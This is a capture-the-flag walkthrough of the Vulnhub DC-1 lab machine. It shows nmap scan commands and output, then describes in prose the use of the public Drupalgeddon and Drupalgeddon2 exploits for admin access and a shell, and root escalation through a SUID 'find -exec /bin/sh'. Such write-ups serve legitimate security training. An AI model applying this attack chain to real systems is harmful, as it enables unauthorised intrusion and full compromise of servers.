DC-1 Vulnhub CTF Walkthrough
Walkthrough for the DC-1: 1 vulnhub CTF
I started by finding the IP address of the VM using nmap.
nmap -sL 10.1.1.1/24 ... Nmap scan report for DC-1.lan (10.1.1.43) ...
Once I know the IP address is 10.1.1.43, I scan it with nmap with the -sV and -p- flags, which lists out the service information of posts 1 to 65535.
nmap -sV -p- 10.1.1.43 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-12 13:16 ACDT Nmap scan report for DC-1.lan (10.1.1.43) Host is up (0.00010s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 48280/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:7B:44:9C (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds
After finding out that port 80 is open, I open my web browser to have a look around, to find that it is running drupal.
I start by doing a few scans with nikto and dirb, however I dont find much in terms of flags, so I move on to exploiting the drupal site. I use the Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) exploit to create a new admin user, so I can have a bit more of a look at the site.
After a bit of poking around, I found flag3, which indicated that the privilege escalation would involve a file with incorrect file permissions, and would use the -exec argument (which is unique to the "find" command). I didn`t find much else, so I then move onto using the Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) exploit.
Now that I had a shell, I looked around in the website root directory for the remaining flags.
After that, I used the find command to look for a file with the SUID bit set. After finding that the find command has the SUID bit set, I check it with running "whoami" as the -exec command, then spawn a /bin/sh shell, to read the final flag located in /root/.